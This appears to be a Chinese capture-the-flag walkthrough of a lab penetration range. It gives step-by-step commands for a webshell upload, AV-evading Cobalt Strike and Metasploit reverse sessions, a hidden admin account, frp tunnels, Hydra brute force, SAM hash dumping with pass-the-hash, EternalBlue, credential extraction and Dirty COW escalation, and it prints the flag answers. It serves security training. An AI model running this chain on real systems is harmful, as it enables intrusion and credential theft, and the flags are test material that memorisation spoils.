# 网安行动渗透赛

[TOC]

## 一、靶场介绍

#### 1.场景介绍

网络安全竞赛是发现和培养人才最有效的解决方案。网络安全竞赛能够选拔出优秀的网络安全人才，从而加以引导，增强人才储备力量，为建设国家网络安全发挥重大作用。随着各行业的网络安全问题受到日益重视，无论是政府还是企业，都在借助竞赛的形式选拔人才、提升安全技术能力。

#### 2.场景拓扑

![image-20220621115034617555-1655795752337493.png](http://192.168.79.239/ct/upload/other/08daaf5e3926a9c7b5de0191bc81cb2c.png)

#### 3.攻击路线

![image-20220621115051334260-1655795756033650.png](http://192.168.79.239/ct/upload/other/cdfeb4657e2e66fbf0422516f3b5545d.png)

#### 4.知识点

网站后台弱口令

文件上传漏洞

powershell免杀上线

MSF与CS联动上线

mimikatz获取密码

内网穿透

CVE-2021-36934 Windows提权

Hydra弱账户密码爆破

MS17_010永恒之蓝

脏牛提权

#### 5.漏洞编号

 CVE-2016-5159

CVE-2017-0146

CVE-2018-12491 

CVE-2021-36934

#### 6.Att&ck框架指标/Shield防御指标

T - 1021远程服务

T - 1059命令行界面

T - 1068利用漏洞进行权限提升

T - 1083文件与目录发现

T - 1090连接代理

T - 1110暴力破解

T - 1210利用远程服务

T - 1212利用漏洞获取凭证访问的权限

T - 1203利用客户端漏洞获取执行权限

T - 1570工具横向转移

T - 1585建立账户

T - 1592收集目标主机信息

T - 1595主动扫描

#### 7.Engage攻防模型

SAC0008 - 提炼情报

EAC0015 - 信息处理

EAC0014 - 软件操作

EAC0003 - 系统活动监控

EAC0004 - 网络分析

EAC0021 - 攻击向量迁移

EAC0006 - 应用多样性

## 二、靶场解题(Write up)

#### 阶段一：Web

##### 任务1：信息收集(T - 1595主动扫描、T - 1592收集目标主机信息、T - 1059命令行界面、T - 1592收集目标主机信息)

已知目标主机：`192.168.2.100`，`Kali`主机进行访问：

![image-20220618114435868254-1655795757637364.png](http://192.168.79.239/ct/upload/other/57a2b43268c22b57b7af35127295fed4.png)

##### 任务2：指纹识别(T - 1595主动扫描、T - 1592收集目标主机信息、T - 1059命令行界面、T - 1592收集目标主机信息)

在桌面启动终端进行指纹识别：

```
whatweb 192.168.2.100
```

![image-20220618114557141479-1655795759192212.png](http://192.168.79.239/ct/upload/other/871e8f5506c2f5f093a9de86b0c652d9.png)

##### 任务3：端口扫描(T - 1595主动扫描、T - 1592收集目标主机信息、T - 1059命令行界面、T - 1592收集目标主机信息)

端口扫描：

```
nmap 192.168.2.100
```

![image-20220618114731083124-1655795760716106.png](http://192.168.79.239/ct/upload/other/b2605a327fab452ce608e18549355c3f.png)

发现以上端口开放。

##### 任务4：目录扫描(T - 1595主动扫描、T - 1592收集目标主机信息、T - 1059命令行界面、T - 1592收集目标主机信息)

登录`Win10`主机，进入`C:\Users\Administrator\Desktop\工具\目录扫描\dirsearch`目录，在该目录的地址栏输入cmd并回车打开命令行，执行命令：

```
python3 dirsearch.py -u http://192.168.2.100 -e *
```

![image-20220618132615934961-1655795762231850.png](http://192.168.79.239/ct/upload/other/b4f84b598112406cbc191faf6be3902b.png)

存在可疑界面`admin.php`。

##### 任务5：后台弱口令(T - 1592收集目标主机信息)

猜测`admin.php`为后台网站，回到`Kali`主机访问`http://192.168.2.100/admin.php`，尝试弱口令账户密码：`admin/root`：

![image-20220618133224142147-1655795763729871.png](http://192.168.79.239/ct/upload/other/5a275160b5725f5b674fc96600c7ae54.png)

登录成功：

![image-20220618133239493715-1655795765227888.png](http://192.168.79.239/ct/upload/other/edfd561fa1eb18a2bfd04a4b33752ec1.png)

##### 任务6：后台模块漏洞利用(T - 1203利用客户端漏洞获取执行权限)

点击`模块管理`->`模块导入`->`选中本地文件`，文件选中桌面shell文件夹内的`shell.zip`文件：

![image-20220618133612059341-1655795766744678.png](http://192.168.79.239/ct/upload/other/495bca25c8af9656da5ae08d6fae607a.png)

![image-20220618133633368239-1655795768153632.png](http://192.168.79.239/ct/upload/other/1ea1bfaf716a748b0b6cf6b7a60e0cf9.png)

![image-20220618133646269295-1655795769678285.png](http://192.168.79.239/ct/upload/other/8f3191910cea7d1e5991c82582840497.png)

该版本cms存在漏洞会将zip上传到网站`data\cache`目录下，同时将里面内容解压出来。

进入`/root/Desktop/Tools/AntSword`目录，右键打开终端，执行命令启动蚁剑：

```
./AntSword
```

右键空白处点击`Add`，shell信息如下：

```
Shell url:http://192.168.2.100/data/cache/shell.php

Shell pwd:cmd
```

![image-20220618134055976868-1655795771200160.png](http://192.168.79.239/ct/upload/other/e3641b8f98998f7621d3473e09b42f92.png)

点击`Add`添加，添加成功后右键URL点击`>_ Terminal`进入终端，查看进程：

```
tasklist /svc
```

发现运行火绒软件：

![image-20220618134446081120-1655795772702213.png](http://192.168.79.239/ct/upload/other/cc860fab2f131bdf11571f1b815e82a2.png)

##### 任务7：CS免杀上线(T - 1203利用客户端漏洞获取执行权限)

进入`/root/Desktop/Tools/cs4.2`目录，右键打开终端，启动CS服务端：

```
./teamserver 10.11.11.111 123456
```

![image-20220620153255891366-1655795774660624.png](http://192.168.79.239/ct/upload/other/9bac2edd953e989331d9761b19869d96.png)

回到`Win10`主机，启动CS客户端：

![image-20220620162658800223-1655795776152002.png](http://192.168.79.239/ct/upload/other/772c51d6fb7893bc54c972b44b802b59.png)

连接信息如下：

```
主机：10.11.11.111
端口：50050
用户：neo
密码：123456
```

![image-20220620163015845566-1655795777637264.png](http://192.168.79.239/ct/upload/other/9cf6e30520a5fca01fc39cd2654cb692.png)

点击`连接`>>`是`

![image-20220620163046673325-1655795779147252.png](http://192.168.79.239/ct/upload/other/da127a2bbf4d35826b9ba230536094f1.png)

开启监听：

![image-20220620163111574912-1655795780637271.png](http://192.168.79.239/ct/upload/other/6ace2bf74a3c1c1bfcf161fdd63d014b.png)

添加监听器：

![image-20220620163323589109-1655795782197925.png](http://192.168.79.239/ct/upload/other/a02b508106abda88c9d3a174e24f1f9c.png)

生成木马：

![image-20220620163353291409-1655795783786679.png](http://192.168.79.239/ct/upload/other/76a87526941cd4a54414cf08d0dc678d.png)

配置木马，完成后点击`Generate`：

![image-20220620163419844531-1655795785269375.png](http://192.168.79.239/ct/upload/other/b92539688b4c81e69e29453d6766363e.png)

将文件保存在桌面：

![image-20220620163645591310-1655795786781279.png](http://192.168.79.239/ct/upload/other/24f9a6626c34181f90545580488951e4.png)

![image-20220620164141986882-1655795788257605.png](http://192.168.79.239/ct/upload/other/2df9861fa697482c9b7a2993f72395e7.png)

进入`C:\Users\Administrator\Desktop\工具\免杀`目录，启动免杀工具：

![image-20220620164325389627-1655795789754259.png](http://192.168.79.239/ct/upload/other/394e37501cf6309bd1c4705df07cadb6.png)

配置如下，点击`生成`：

![image-20220620164430124265-1655795791258999.png](http://192.168.79.239/ct/upload/other/f0afbcbc3b993b3639c39708f2cf4516.png)

保存在桌面：

![image-20220620164453442449-1655795792750390.png](http://192.168.79.239/ct/upload/other/580ad5f37c16481b26ac43322e31ccba.png)

工具生成两个文件：

![image-20220620164632988448-1655795794242072.png](http://192.168.79.239/ct/upload/other/710c302e89c62fb1267a56aa7212545a.png)

打开蚁剑，使用相同的shell信息连接：

![image-20220620164728671807-1655795795801722.png](http://192.168.79.239/ct/upload/other/62d662522b5bc12cbb5ebda49f2afa1f.png)

双击URL进入文件目录，将免杀工具生成的两个文件通过拖拽进行上传：

![image-20220620164844474219-1655795797284079.png](http://192.168.79.239/ct/upload/other/3aa5f02258e96f64ad41ea7912d8751a.png)

在上传的文件所在目录右键打开终端，执行命令：

```
XXX.exe XXX.txt

##XXX表示免杀工具生成文件的前缀
```

![image-20220620165144678946-1655795798775103.png](http://192.168.79.239/ct/upload/other/f0840166e0529cf7508dc0d599ddbe77.png)

CS客户端目标主机上线：

![image-20220620165211494294-1655795800253394.png](http://192.168.79.239/ct/upload/other/7f0ebe69821dd1d00143f21688f33acc.png)

##### 任务8：MSF与CS联动上线(T - 1068利用漏洞进行权限提升、T - 1585建立账户)

回到`Kali`主机，在桌面启动终端，执行命令建立监听：

```
msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 10.11.11.111

set lport 7777

run
```

![image-20220620170338123466-1655795801765353.png](http://192.168.79.239/ct/upload/other/cb53853cc81e2f374140fac9a62a690b.png)

进入`/root/Desktop/Tools/cs4.2`目录下启动终端，执行命令：

```
./start.sh
```

连接信息如下：

```
Host:127.0.0.1
Port:50050
User:john
Password:123456
```

建立监听：

![image-20220620170414757955-1655795803255984.png](http://192.168.79.239/ct/upload/other/fe090c79cc4c71751e2ab2dc33ebe1aa.png)

监听器信息如下：

![image-20220620170652534175-1655795804730067.png](http://192.168.79.239/ct/upload/other/9890e9df4def85a59fee671c717ec87c.png)

选中上线主机，右键进行攻击：

![image-20220620170746940368-1655795806170993.png](http://192.168.79.239/ct/upload/other/280b879f6918ca8f19546853e19ec76e.png)

选中监听器和攻击方式进行攻击：

![image-20220620170823778826-1655795807688936.png](http://192.168.79.239/ct/upload/other/0d51a9a58755fecb6f69c2256ce5a9e9.png)

攻击成功后获取到目标的system权限：

![image-20220620170950659453-1655795809182078.png](http://192.168.79.239/ct/upload/other/94b8a448e805070633df3b059d708e24.png)

建立会话，右键新上线的主机点击`Spawn`：

![image-20220620171159047588-1655795810687657.png](http://192.168.79.239/ct/upload/other/cb5340731323b8b14220ea15eedf30a0.png)

选择监听器：

![image-20220620171208629765-1655795812177728.png](http://192.168.79.239/ct/upload/other/73ae04b2ba173bf2c648066d4f54fc07.png)

MSF中获取到会话（若无会话连接请再试一次）：

![image-20220620171426841364-1655795813673731.png](http://192.168.79.239/ct/upload/other/5c39a8195667a318c82527701d8c47f3.png)

查看权限：

![image-20220620171451144942-1655795815936724.png](http://192.168.79.239/ct/upload/other/a5c304b567df9283229d44efa50ceb3e.png)

进入交互终端：

![image-20220620171521104829-1655795817450896.png](http://192.168.79.239/ct/upload/other/d8ca941611449a021cca1ab9f2e329cb.png)

创建隐藏账户：

```
cd C:\Windows\System32

copy net1.exe net2.txt

net2.txt user hacker$ admin /add  //添加隐藏用户

net2.txt localgroup administrators hacker$ /add   //加入到管理员组中
```

![image-20220620171626252528-1655795819055391.png](http://192.168.79.239/ct/upload/other/5048fcc90db7862eed63c78834030075.png)

账户创建成功后回到`Win10`主机进行远程登录：

![image-20220620172319818214-1655795820552798.png](http://192.168.79.239/ct/upload/other/164021dfb825bbc2623e998512e6a66d.png)

远程信息如下：

```
主机地址：192.168.2.100

登录信息：hacker$/admin
```

登录成功后发现flag：

![image-20220620172539499940-1655795822085375.png](http://192.168.79.239/ct/upload/other/7112f551452868e80f834d766c02e82f.png)

```
flag{32D3-0BA4-076B-FE71-A6E8-0960-84AA-4F5F}
```

##### 任务9：系统信息收集(T - 1595主动扫描)

退出火绒软件：

![image-20220620173128708740-1655795823572806.png](http://192.168.79.239/ct/upload/other/f8e89cda33c70c4419d70a17c063591f.png)

![image-20220620173143933771-1655795825067073.png](http://192.168.79.239/ct/upload/other/2d83e80b88acd40f22eb1f2c42df3cba.png)

启动命令行：

![image-20220620173510225219-1655795826809968.png](http://192.168.79.239/ct/upload/other/fc1df783657b5dbe39fd6694cf30a382.png)

执行命令进行探测：

```
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.2.%I | findstr "TTL"
```

发现存活主机：

![image-20220620174229509145-1655795828281010.png](http://192.168.79.239/ct/upload/other/b8695f648c72a38cd6e6aca630d92b0e.png)

##### 任务10：搭建内网隧道(T - 1090连接代理)

回到`Win10`主机，进入`C:\Users\Administrator\Desktop\工具\流量代理\frp\frp_0.37.0_windows_amd64\frp_0.37.0_windows_amd64`目录，在地址栏输入cmd并回车启动命令行，执行命令启动代理服务端：

```
frps.exe -c frps.ini
```

![image-20220620174838127687-1655795829774022.png](http://192.168.79.239/ct/upload/other/9dd52591af65fe82fe76307aa03b051a.png)

修改`frpc.ini`文件为如下内容：

```
[common]
server_addr = 10.11.11.11
server_port = 7000

[ssh]
type = tcp
remote_port = 9998
plugin = socks5
```

将`frpc.exe`文件和`frpc.ini`文件复制粘贴至远程主机`192.168.2.100`的桌面中：

![image-20220620175113929587-1655795831247084.png](http://192.168.79.239/ct/upload/other/08e6b8be620bfc8399ddda84582b2aaa.png)

启动命令行执行命令启动代理客户端：

```
cd Desktop

frpc.exe -c frpc.ini
```

![image-20220620175150707051-1655795832700380.png](http://192.168.79.239/ct/upload/other/ef0e2a523a1cb703b5e5c76a53dc479d.png)

隧道建立成功：

![image-20220620175229389588-1655795834177228.png](http://192.168.79.239/ct/upload/other/fc78666531440f16eda6b7a59254f8e2.png)

#### 阶段二：OM

##### 任务11：主机探测(T - 1595主动扫描、T - 1592收集目标主机信息、T - 1059命令行界面、T - 1592收集目标主机信息)

回到`Kali`主机，打开终端修改代理信息：

```
vim /etc/proxychains4.conf
```

代理信息设置如下：

![image-20220620175451715759-1655795835643931.png](http://192.168.79.239/ct/upload/other/5c7f8e131119427dd7e15f9ac7bf8925.png)

扫描目标主机：

```
proxychains4 nmap -Pn -sT -p80,135,445,3389 192.168.2.150
```

![image-20220621091615880582-1655795837533447.png](http://192.168.79.239/ct/upload/other/c44e9e08a9c1577a49f0ab0017e8c15e.png)

目标开放3389端口，尝试密码爆破。

##### 任务12：Hydra弱密码爆破(T - 1110暴力破解)

执行命令：

```
proxychains4 hydra -L '/root/Desktop/Tools/fuzzDicts/userNameDict/top500.txt' -P '/root/Desktop/Tools/fuzzDicts/passwordDict/top500.txt' rdp://192.168.2.150 -t 1 -V
```

![image-20220621094137390810-1655795838990515.png](http://192.168.79.239/ct/upload/other/b89ed06b2dc8f60aa1065e2cf9355689.png)

获取账户密码：`test/123456`：

##### 任务13：远程桌面登录(T - 1021远程服务)

回到`Win10`主机，双击启动全局代理工具：

![image-20220621091933539177-1655795840441510.png](http://192.168.79.239/ct/upload/other/910999b46f735d90a76df61f9caf9625.png)

双击任务栏图标：

![image-20220621092009988759-1655795841913766.png](http://192.168.79.239/ct/upload/other/0686d8411a55f9e79bc95ab099d0262e.png)

新增代理服务器：

![image-20220621092031763904-1655795843513367.png](http://192.168.79.239/ct/upload/other/6a82a9a1e66c03003c87c5feaf24d178.png)

![image-20220621092041599936-1655795844981036.png](http://192.168.79.239/ct/upload/other/cb85dcd9174fc8576d75b6c10c2eaf4f.png)

代理信息如下：

![image-20220621092115672483-1655795846519645.png](http://192.168.79.239/ct/upload/other/fb7cbfa20f57076f866ba7d47c055be9.png)

![image-20220621092125283838-1655795848028110.png](http://192.168.79.239/ct/upload/other/66a61da7a6ca31b27a02974aac8af360.png)

![image-20220621092133718542-1655795849572705.png](http://192.168.79.239/ct/upload/other/ca771de9598ab6cbb2132a73cbe902ad.png)

![image-20220621092142929283-1655795851049394.png](http://192.168.79.239/ct/upload/other/d4df9254c3de71f9dd1accf06d635132.png)

若提示添加失败则再试一次；启动远程桌面程序，远程主机信息如下：

```
主机地址：192.168.2.150

登录信息：test/123456
```

登陆成功后进行信息收集。

##### 任务14：Hash提权(T - 1068利用漏洞进行权限提升)

查看当前用户信息，检测当前主机是否容易受到攻击：

```
icacls C:\windows\system32\config\sam
```

![image-20220621092918571044-1655795852557384.png](http://192.168.79.239/ct/upload/other/18dead33303338f01d6c36045acaab6e.png)

输出`BUILTIN\Users:(I)(RX)`表示该系统易受攻击。

将`Win10`主机`C:\Users\Administrator\Desktop\工具\exp\CVE-2021-36934`目录下的`HiveNightmare.exe`文件复制粘贴至远程主机`192.168.2.150`的桌面中：

![image-20220621094338675370-1655795854024724.png](http://192.168.79.239/ct/upload/other/a7bd523679ab9cfedac574df242d44e1.png)

命令行中执行命令：

```
cd Desktop

HiveNightmare.exe
```

![image-20220621094436917061-1655795856256429.png](http://192.168.79.239/ct/upload/other/91b546bc005bfb89e931a75cbccb6747.png)

桌面出现三个文件：

![image-20220621094510481340-1655795857734125.png](http://192.168.79.239/ct/upload/other/be5518667a79325770fb7e80701fe01f.png)

将这三个文件复制粘贴至`Win10`主机的`C:\Users\Administrator\Desktop\工具\内网渗透\impacket-master\impacket-master\examples`目录下，在该目录下打开命令行执行命令：

```
python3 secretsdump.py -sam SAM-2022-06-20 -system SYSTEM-2022-06-20 -security SECURITY-2022-06-20 LOCAL

##SAM-2022-06-20、SYSTEM-2022-06-20、SECURITY-2022-06-20为生成的文件名，请以实际情况进行填写。
```

![image-20220621094953535733-1655795859221117.png](http://192.168.79.239/ct/upload/other/b7461fc1b77bd07a88045779e49f0ac7.png)

获取到密码hash：

![image-20220621095050454699-1655795860714808.png](http://192.168.79.239/ct/upload/other/5db694fc41624161e873371fba5ea401.png)

再执行命令进行横向移动：

```
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5d3d0d5e35d5b0c22f7617f472c859c0 administrator@192.168.2.150 cmd.exe
```

![image-20220621100706837425-1655795862184879.png](http://192.168.79.239/ct/upload/other/a8132fdd9dedd49046c1033d7790de46.png)

查看当前权限：

![image-20220621100734010209-1655795863666626.png](http://192.168.79.239/ct/upload/other/d107ca17f42f185f11f2c4de9caf6d00.png)

查看flag：

```
cd C:\

dir /s /b flag.txt
```

![image-20220621100835779144-1655795865154522.png](http://192.168.79.239/ct/upload/other/7b82a20b6103e8f799dfcb02795e41a5.png)

查看flag（若无回显可按几次回车）：

![image-20220621100909958780-1655795866635535.png](http://192.168.79.239/ct/upload/other/04e4d0fd20b1551fc13a77e7c6364d13.png)

```
flag{915C-0005-59BA-73EF-09D0-6E35-AA2A-A088}
```

信息收集：

```
route print >> 1.txt

type 1.txt
```

![image-20220621101101044911-1655795868133532.png](http://192.168.79.239/ct/upload/other/4071624fc74e926271158a882d28effa.png)

发现内网信息，进入`192.168.2.150`主机的远程桌面，命令行中执行命令：

```
for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.10.%I | findstr "TTL"
```

发现存活主机：

![image-20220621102035095078-1655795869635450.png](http://192.168.79.239/ct/upload/other/6688598ec9f3857056c16a4646784add.png)

##### 任务15：内网代理(T - 1090连接代理)

`Win10`主机中进入`C:\Users\Administrator\Desktop\工具\流量代理\frp\frp_0.37.0_windows_amd64\frp_0.37.0_windows_amd64`目录，修改`frpc.ini`文件为如下内容：

```
[common]
server_addr = 192.168.2.100
server_port = 7000


[ssh]
type = tcp
remote_port = 9998
plugin = socks5
```

将`frps.exe`文件和`frps.ini`文件上传至`192.168.2.100`主机的远程桌面，将`frpc.exe`文件和`frpc.ini`文件上传至`192.168.2.150`主机的远程桌面。

`192.168.2.100`主机的远程桌面中打开命令行，启动代理服务端：

```
cd Desktop

frps.exe -c frps.ini
```

![image-20220621102246224972-1655795871189459.png](http://192.168.79.239/ct/upload/other/c33d0859ac65fe1e5a9f31e49ad33626.png)

`192.168.2.150`主机的远程桌面中，执行命令启动代理客户端：

```
frpc.exe -c frpc.ini
```

![image-20220621102349185210-1655795872768762.png](http://192.168.79.239/ct/upload/other/d121175454b4d43b3209670a20d8ada7.png)

出现`success`表示隧道建立成功。

#### 阶段三：Server

##### 任务16：永恒之蓝(T - 1068利用漏洞进行权限提升)

回到`Kali`主机，修改代理规则为下图所示内容：

![image-20220621102643184535-1655795874217990.png](http://192.168.79.239/ct/upload/other/42c706dac169d2e1f81923ff711c8195.png)

对目标进行探测：

```
proxychains4 nmap -Pn -sT -p80,135,445,3389 10.10.10.182
```

![image-20220621102838266457-1655795875676770.png](http://192.168.79.239/ct/upload/other/b0fba0c0ef3369f6d0f7837572b1c01b.png)

目标开放445端口，测试是否存在永恒之蓝，启动终端执行命令：

```
proxychains4 msfconsole

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/bind_tcp

set rhost 10.10.10.182

run
```

获取到会话：

![image-20220621103038782936-1655795877157813.png](http://192.168.79.239/ct/upload/other/dea536180be7b85ffddef39a2f73a11b.png)

查看权限：

![image-20220621103113093877-1655795878638986.png](http://192.168.79.239/ct/upload/other/9c0629370c574e3e8b68030480e4a1bb.png)

加载kiwi模块：

```
load kiwi
```

![image-20220621103149286551-1655795880129004.png](http://192.168.79.239/ct/upload/other/73c6edcc6fa1832199663a5db7d8b1ef.png)

获取主机账户密码。

```
creds_kerberos
```

![image-20220621103223056464-1655795881681318.png](http://192.168.79.239/ct/upload/other/65c14a63fc50aed5b5117590f49b7218.png)

##### 任务17：获取敏感信息(T - 1592收集目标主机信息)

回到`Win10`主机，新增代理服务器：

![image-20220621103412226192-1655795883201288.png](http://192.168.79.239/ct/upload/other/fb5319231eeaff9d3547006c6aba07fd.png)

![image-20220621103423699903-1655795884718270.png](http://192.168.79.239/ct/upload/other/8cdec85cbd7a5fc68d2133a565b2d48b.png)

代理信息如下：

![image-20220621103452165044-1655795886510601.png](http://192.168.79.239/ct/upload/other/3f87c0e3a6e07431118a22081884a4ce.png)

![image-20220621103501538457-1655795888220666.png](http://192.168.79.239/ct/upload/other/846194657dc62f494cd0164b4d978589.png)

设置代理规则：

![image-20220621103519149149-1655795890466166.png](http://192.168.79.239/ct/upload/other/57c273880ad5cff7a185ac625f724ce9.png)

![image-20220621103556696770-1655795891985560.png](http://192.168.79.239/ct/upload/other/664ba3711275ea77980f874b249637e2.png)

![image-20220621103609926481-1655795894555366.png](http://192.168.79.239/ct/upload/other/2b6bbc9cf7cacdbfe7947d21bff537e9.png)

远程目标主机，信息如下：

```
主机地址：10.10.10.182

登录账户：ADLAB\Administrator

登录密码：123456
```

登录成功后在桌面发现flag：

![image-20220621103921138361-1655795896080272.png](http://192.168.79.239/ct/upload/other/1e178e56195f3bc032e96546999bb3a3.png)

```
flag{11F1-45C9-8809-B6D3-206D-584C-EBD4-EBD8}
```

回收站发现敏感文件，还原后发现敏感信息：

![image-20220621104048944935-1655795897565304.png](http://192.168.79.239/ct/upload/other/cdc2a89b6f3aa9d981f78e4a529e7c9a.png)

#### 阶段四：Client

##### 任务18：脏牛提权(T - 1068利用漏洞进行权限提升)

回到`Kali`主机，打开终端对目标进行探测：

```
proxychains4 nmap -Pn -sT -p22,80,135,445,3389 10.10.10.62
```

![image-20220621104640115817-1655795899091948.png](http://192.168.79.239/ct/upload/other/24e08ff39523575b6f8d3714315adbce.png)

发现目标开放22端口，回到`Win10`主机，启动`FinalShell`：

![image-20220621110718136387-1655795900656621.png](http://192.168.79.239/ct/upload/other/ec3f7a21ac24795e15707b5b7690911b.png)

建立SSH连接：

![image-20220621111853941206-1655795902299782.png](http://192.168.79.239/ct/upload/other/9ba7a1b27a69a5f5efc352ece084a165.png)

连接信息如下，密码为`@admin123`：

![image-20220621112011044487-1655795904962804.png](http://192.168.79.239/ct/upload/other/3ea1458b3a9de6072d8aa216ce1c215a.png)

双击记录后连接成功：

![image-20220621151113279434-1655795907130263.png](http://192.168.79.239/ct/upload/other/2bad4b10df2ffc5a5dbd1a5f17af63a7.png)

![image-20220621112101110087-1655795908795660.png](http://192.168.79.239/ct/upload/other/36ed879d311d4f50d5d9ac5b87b0529a.png)

![image-20220621112142387329-1655795910981040.png](http://192.168.79.239/ct/upload/other/21e7f283d59a972b761ed3c7cc347261.png)

切换用户：

```
su test123

@admin123
```

在`/root/`目录下发现flag：

![image-20220621112342709946-1655795913334862.png](http://192.168.79.239/ct/upload/other/289f35d0ef75f42daa77642ed1548966.png)

查看flag，提示权限不足：

![image-20220621112408541687-1655795915377769.png](http://192.168.79.239/ct/upload/other/773ec4cdf30822d1bb66c4bfc5d1825c.png)

查看系统内核版本，符合脏牛提权：

```
uname -a
```

![image-20220621112429840639-1655795917555218.png](http://192.168.79.239/ct/upload/other/f4788e1f5b1cd4e53c34fceaa9ba291c.png)

将`Win10`主机`C:\Users\Administrator\Desktop\工具\exp`目录下的`CVE-2016-5195-master.zip`文件通过拖拽的方式上传至`10.10.10.62`主机的`/home/test123/`目录下：

![image-20220621151239833860-1655795919558428.png](http://192.168.79.239/ct/upload/other/952d0bb25daa020d106f9f9793acfa95.png)

终端执行命令：

```
cd /home/test123/

unzip CVE-2016-5195-master.zip

cd CVE-2016-5195-master

make

./dcow
```

![image-20220621113329058851-1655795922293604.png](http://192.168.79.239/ct/upload/other/98174e4ce23934acb5d121de676c74ae.png)

登录验证：

```
su root

dirtyCowFun

cat /root/flag
```

获取到flag：

![image-20220621113507470349-1655795924367574.png](http://192.168.79.239/ct/upload/other/d1e19db34066f6612007c06679547f7d.png)

```
flag{D973-F169-44C8-7CC2-4ECB-2F76-389B-15B6}
```